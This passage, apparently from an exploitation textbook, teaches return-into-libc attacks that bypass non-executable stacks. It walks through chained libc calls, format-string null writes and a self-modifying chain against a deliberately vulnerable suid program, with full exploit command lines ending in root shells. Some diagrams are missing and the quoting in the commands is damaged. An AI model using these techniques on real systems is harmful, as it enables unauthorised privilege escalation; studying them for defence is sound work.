0x2b0 Returning into libc

Most applications never need to execute anything on the stack, so an obvious defense against buffer-overflow exploits is to make the stack non-executable. When this is done, shellcode existing anywhere on the stack is basically useless. This type of defense will stop the majority of exploits out there, and it is becoming more popular. The latest version of OpenBSD has a non-executable stack by default.

Of course, there is a corresponding technique that can be used to exploit programs in an environment with a non-executable stack. This technique is known as returning into libc. Libc is a standard C library that contains various basic functions, like printf() and exit(). These functions are shared, so any program that uses the printf() function directs execution into the appropriate location in libc. An exploit can do the exact same thing and direct a program's execution into a certain function in libc. The functionality of the exploit is limited by the functions in libc, which is a significant restriction when compared to arbitrary shellcode. However, nothing is ever executed on the stack.

0x2b1 Returning into system()

One of the simplest libc functions to return into is system(). This function takes a single argument and executes that argument with /bin/sh. For this example, the simple vulnerable program vuln2.c will be used.

The general idea is to get the vulnerable program to spawn a shell, without executing anything on the stack, by returning into the libc function system(). If this function is supplied with the argument of "/bin/sh", this should spawn a shell.

$ cat vuln2.c
int main(int argc, char *argv[])
{
      char buffer[5];
      strcpy(buffer, argv[1]);
      return 0;
}
$ gcc -o vuln2 vuln2.c
$ sudo chown root.root vuln2
$ sudo chmod u+s vuln2

First, the location of the system() function in libc must be determined. This will be different for every system, but once the location is known, it will remain the same until libc is recompiled. One of the easiest ways to find the location of a libc function is to create a simple dummy program and debug it, like this:

$ cat > dummy.c
int main()
{
system();
}
$ gcc -o dummy dummy.c
$ gdb -q dummy
(gdb) break main
Breakpoint 1 at 0x8048406
(gdb) run
Starting program: /hacking/dummy

Breakpoint 1, 0x08048406 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x42049e54 <system>
(gdb) quit

Here a dummy program is created that uses the system() function. After it's compiled, the binary is opened in a debugger and a breakpoint is set at the beginning. The program is executed, and then the location of the system() function is displayed. In this case, the system() function is located at 0x42049e54.

Armed with that knowledge, program execution can be directed into the system() function of libc. However, the goal here is to cause the vulnerable program to execute system("/bin/sh") to provide a shell, so an argument must be supplied. When returning into libc, the return address and function arguments are read off the stack in what should be a familiar format: the return address followed by the arguments. On the stack, the return-into-libc call should look something like this:

Directly after the address of the desired libc function is the address where execution should return to after the libc call. After that return address are all of the function arguments in sequence.

In this case, it doesn't really matter where the execution returns to after the libc call, because it will be opening an interactive shell. Therefore, these 4 bytes can just be a placeholder value of "FAKE". There is only one argument, which should be a pointer to the string /bin/sh. This can be stored anywhere in memory — an environment variable is an excellent candidate.

$ export BINSH="/bin/sh"
$ ./gtenv BINSH
BINSH is located at 0xbffffc40
$

So the system() address is 0x42049e54, and the address for the "/bin/sh" string will be 0xbffffc40 when the program is executed. That means the return address on the stack should be overwritten with a series of addresses, beginning with 0x42049e54, followed by FAKE (because it doesn't matter where execution goes after the system() call), and concluding with 0xbffffc40.

Prior experience with the vuln2 program has shown that the return address on the stack is overwritten by the eighth word of the program input, so seven words of dummy data are used for spacing.

$ ./vuln2 'perl -e 'print "ABCD"x7 . "\x54\x9e\x04\x42FAKE\x40\xfc\xff\xbf";''
sh-2.05a$ id
uid=500(matrix) gid=500(matrix) groups=500(matrix)
sh-2.05a$ exit
exit
Segmentation fault
$ ls -l vuln2
-rwsrwxr-x    1 root    root    13508 Apr 16 22:10 vuln2
$

The system() call worked, but it didn't provide a root shell, even though the vuln2 program was suid root. This is because system() executes everything through /bin/sh, which drops privileges. There must be a way around this.

0x2b2 Chaining Return into libc Calls

In a BugTraq post, Solar Designer suggested chaining libc calls so a setuid() executes before the system() call to restore privileges. This chaining can be done by taking advantage of the return address value that was previously ignored. The following series of addresses will chain a call from setuid() to system(), as shown in this illustration.

The setuid() call will execute with its argument. Because it's only expecting one argument, the argument for the system() call (the fourth word) will be ignored. After it's finished, execution will return to the system() function, which will use its argument as expected.

The idea of chaining calls is quite clever, but there are other problems inherent in this method of restoring privileges. The setuid() argument is expecting an unsigned integer value, so in order to restore root level privileges, this value must be 0x00000000. Unfortunately, the buffer is still a string that will be terminated by null bytes. Avoiding the use of null bytes, the lowest value that can be used for this argument is 0x01010101, which has a decimal value of 16843009. While this isn't quite the desired result, the concept of chaining calls is still important and worth the practice.

$ cat > dummy.c
int main() { setuid(); }
$ gcc -o dummy dummy.c
$ gdb -q dummy
(gdb) break main
Breakpoint 1 at 0x8048406
(gdb) run
Starting program: /hacking/dummy

Breakpoint 1, 0x08048406 in main ()
(gdb) p setuid
$1 = {<text variable, no debug info>} 0x420b5524 <setuid>
(gdb) quit
The program is running. Exit anyway? (y or n) y
$ ./vuln2 'perl -e 'print "ABCD"x7 .
"\x24\x55\x0b\x42\x54\x9e\x04\x42\x01\x01\x01\x01\x40\xfc\xff\xbf";''
sh-2.05a$ id
uid=16843009 gid=500(matrix) groups=500(matrix)
sh-2.05a$ exit
exit
Segmentation fault
$

The address of the setuid() function is determined the same way as before, and the chained libc call is set up as described previously. The setuid() arguments are displayed in bold to make them more readable. As expected, the uid is set to 16843009, but this is still far from a root shell. Somehow, a setuid(0) call must be made without terminating the string early with null bytes.

0x2b3 Using a Wrapper

One simple and effective solution is to create a wrapper program. This wrapper will set the user ID (and group ID) to 0 and then spawn a shell. This program doesn't need any special privileges, because the vulnerable suid root program will be executing it.

In the following output, a wrapper program is created, compiled, and used.

$ cat > wrapper.c
int main()
{
setuid(0);
setgid(0);
system("/bin/sh");
}
$ gcc -o /hacking/wrapper wrapper.c
$ export WRAPPER="/hacking/wrapper"
$ ./gtenv WRAPPER
WRAPPER is located at 0xbffffc71
$ ./vuln2 'perl -e 'print "ABCD"x7 . "\x54\x9e\x04\x42FAKE\x71\xfc\xff\xbf";''
sh-2.05a$ id
uid=500(matrix) gid=500(matrix) groups=500(matrix)
sh-2.05a$ exit
exit
Segmentation fault
$

As the preceding results show, privileges are still being dropped. Can you figure out why?

The wrapper program is still being executed with system(), which executes everything through /bin/sh. This will drop privileges as the wrapper is executed, because /bin/sh drops privileges. However, a more direct execution function, like execl(), doesn't use /bin/sh and therefore shouldn't drop privileges. This effect can be tested and confirmed quickly with a few test programs.

$ cat > test.c
int main()
{
system("/hacking/wrapper");
}
$ gcc -o test test.c
$ sudo chown root.root test
$ sudo chmod u+s test
$ ls -l test
-rwsrwxr-x    1 root    root       13511 Apr 17 23:29 test
$ ./test
sh-2.05a$ id
uid=500(matrix) gid=500(matrix) groups=500(matrix)
sh-2.05a$ exit
exit
$
$ cat > test2.c
int main()
{
execl("/hacking/wrapper", "/hacking/wrapper", 0);
}
$ gcc -o test2 test2.c
$ sudo chown root.root test2
$ sudo chmod u+s test2
$ ls -l test2
-rwsrwxr-x    1 root    root       13511 Apr 17 23:33 test2
$ ./test2
sh-2.05a# id uid=0(root) gid=0(root) groups=500(matrix)
sh-2.05a# exit
exit
$

The test programs confirm that a root shell will be spawned if the wrapper program is executed with execl() from a setuid root program. Unfortunately, execl() is a more complex function than system(), especially for returning into libc. The system() function only requires a single argument, but the execl() call will require three arguments, the last of which must be four null bytes (to terminate the argument list). But the first null byte will terminate the string early, causing a dilemma similar to what we had before. Can you think of a solution?

0x2b4 Writing Nulls with Return into libc

Obviously, to make a clean execl() call, there must be some other call before it to write the 4-byte word of nulls. I spent a decent amount of time searching through all of the libc functions, looking for a likely candidate for this task. Finally my search converged on the printf() function. You should be familiar with this function by now from the format-string exploits. The use of direct parameter access allows the function to access only the function arguments it needs, which is helpful when chaining libc calls. Also, the %n format parameter can be used to neatly write four null bytes. The complete chained call looks something like this:

First, the printf() function executes with four arguments, but the use of direct parameter access in the format string found in the first argument causes the function to skip over the second and third arguments. Because the final argument is its own address, the four null bytes will overwrite that argument. Then the execution will return into the execl() function, which will use three arguments as expected, the third argument neatly terminating the argument list with a null.

So now that there's a plan, the addresses for the libc functions need to be found, and some strings need to be put into memory.

$ cat > dummy.c
int main() { printf(0); execl(); }
$ gcc -g -o dummy dummy.c
$ gdb -q dummy
(gdb) break main
Breakpoint 1 at 0x8048446: file dummy.c, line 1.
(gdb) run
Starting program: /hacking/dummy

Breakpoint 1, 0x08048446 in main () at dummy.c:1
1       int main() { printf(); execl(); }
(gdb) p printf
$1 = {<text variable, no debug info>} 0x4205a1b4 <printf>
(gdb) p execl
$2 = {<text variable, no debug info>} 0x420b4e54 <execl>
(gdb) quit
The program is running. Exit anyway? (y or n) y
$
$ export WRAPPER="/hacking/wrapper"
$ export FMTSTR="%3\$n"
$ env | grep FMTSTR
FMTSTR=%3$n
$ ./gtenv FMTSTR
FMTSTR is located at 0xbffffedf
$ ./gtenv WRAPPER
WRAPPER is located at 0xbffffc65
$

The preceding investigation has provided every address needed, except for the last argument. This needs to be the actual address of where this address will be in memory when it's copied over. This will be the address of the buffer variable, plus 48 bytes consiting of 28 bytes of garbage for spacing and then 20 bytes for the prior addresses in the return-into-libc call (the amount of garbage data needed for spacing may differ depending on your system's stack). One of the easiest ways to get this address is to simply add a debugging statement to the vulnerable program's source code and recompile it.

$ cat vulnD.c
int main(int argc, char *argv[])
{
   char buffer[5];
  printf("buffer is at %p\n", buffer);    // debugging
   strcpy(buffer, argv[1]);
   return 0;
}
$ gcc -o vulnD vulnD.c
$ ./vulnD test
buffer is at 0xbffffa80
$ ./vulnD 'perl -e 'print "ABCD"x13;''
buffer is at 0xbffffa50
Segmentation fault
$ pcalc 0xfa50 + 48
        64128           0xfa80                0y1111101010000000
$

With the debugging added (shown in bold), the address of the buffer variable is printed. Presumably, the buffer will be in the same location when the very similar vuln2 program is executed.

However, the length of the program's argument will change the location of the buffer variable. During the exploit, the argument will consist of 13 words (52 bytes) of data. A fake argument with the same length can be used to get the correct buffer address. Then 48 can be added to the buffer address to provide the location of the third execl() argument, where the null word should be written.

With all the addresses known and strings loaded into environment variables, the exploitation is easy.

$ ./vuln2 'perl -e 'print "ABCD"x7 . "\xb4\xa1\x05\x42" . "\x54\x4e\x0b\x42" .
"\xdf\xfe\xff\xbf" . "\x65\xfc\xff\xbf" . "\x65\xfc\xff\xbf" .
"\x80\xfa\xff\xbf";''
sh-2.05a# id
uid=0(root) gid=0(root) groups=500(matrix)
sh-2.05a# exit
exit

0x2b5 Writing Multiple Words with a Single Call

Format strings married with return-into-libc calls can also provide a way to write multiple words with a single call. If it isn't possible to create a wrapper program, a root shell can still be spawned by chaining three libc calls. The sprintf() function works just like printf(), but it outputs to a string designated by its first argument. This can be used to write two 4-byte words with a single call, which will be necessary for three calls to chain properly. The chain will actually modify itself during execution.

The before and after versions look something like this:

The sprintf() call will happen first, parsing the format string to write the 4-byte value of 0 over the address of the format string. Then the rest of the string, containing the address of system(), is written to the address of the first argument, which overwrites itself. After the sprintf() call, the middle two words will be overwritten, and execution will return into the setuid() function. This will execute using the newly written null word as its argument, setting root privileges and finally returning into the newly written address for the system() function, which will execute the shell.

$ echo "int main(){sprintf(0);setuid();system();}">d.c;gcc -o d.o d.c;gdb -q d.o;rm
d.*
(gdb) break main
Breakpoint 1 at 0x8048476
(gdb) run
Starting program: /hacking/d.o

Breakpoint 1, 0x08048476 in main ()
(gdb) p sprintf
$1 = {<text variable, no debug info>} 0x4205a234 <sprintf>
(gdb) p setuid
$2 = {<text variable, no debug info>} 0x420b5524 <setuid>
(gdb) p system
$3 = {<text variable, no debug info>} 0x42049e54 <system>
(gdb) quit
The program is running. Exit anyway? (y or n) y
$ export BINSH="/bin/sh"
$ export FMTSTR="%2\$n'printf "\x54\x9e\x04\x42";'"
$ env | grep FMTSTR
FMTSTR=%2$nTB
$ ./gtenv BINSH
BINSH is located at 0xbffffc34
$ ./gtenv FMTSTR
FMTSTR is located at 0xbffffedd
$ ./vulnD 'perl -e 'print "ABCD"x13;''
buffer is at 0xbffffa60
Segmentation fault
$ pcalc 0xfa60 + 28 + 8
        64132            0xfa84          0y1111101010000100
$ pcalc 0xfa60 + 28 + 12
        64136            0xfa88          0y1111101010001000
$ ./vuln2 'perl -e 'print "ABCD"x7 . "\x34\xa2\x05\x42" . "\x24\x55\x0b\x42" .
"\x84\xfa\xff\xbf" . "\xdd\xfe\xff\xbf" . "\x34\xfc\xff\xbf" .
"\x88\xfa\xff\xbf";''
sh-2.05a# id
uid=0(root) gid=500(matrix) groups=500(matrix)
sh-2.05a#

Once again, a dummy program containing the necessary functions is compiled and debugged to find the function addresses in libc. This time, the process is crammed into a single line.

Next, the format string containing the system() address and the /bin/sh string are put into memory via environment variables, and their respective addresses are calculated. Because the chain needs to modify itself, the address of the chain in memory must also be determined. This is done using vulnD, the version of the vuln2 program containing the debugging statement. Once the address of the beginning of the buffer is known, some simple calculations will reveal the addresses where the system() address and the null word should be written in the chain. Finally, it's just a matter of using these addresses to create the chain and then exploiting. This type of self-modifying chain allows for exploitation on systems with non-executable stacks, without the use of a wrapper program. Nothing but libc calls.

Once the basic concepts of exploiting programs are understood, countless variations are possible with a little bit of creativity. Because the rules of a program are all defined by the creators, exploiting a supposedly secure program is simply a matter of beating them at their own game. New methods, such as stack guards and IDSs, are clever methods to try to compensate for these problems, but these solutions aren't perfect either. A hacker's ingenuity tends to find the holes left in these systems. Just think of the things that they didn't think of.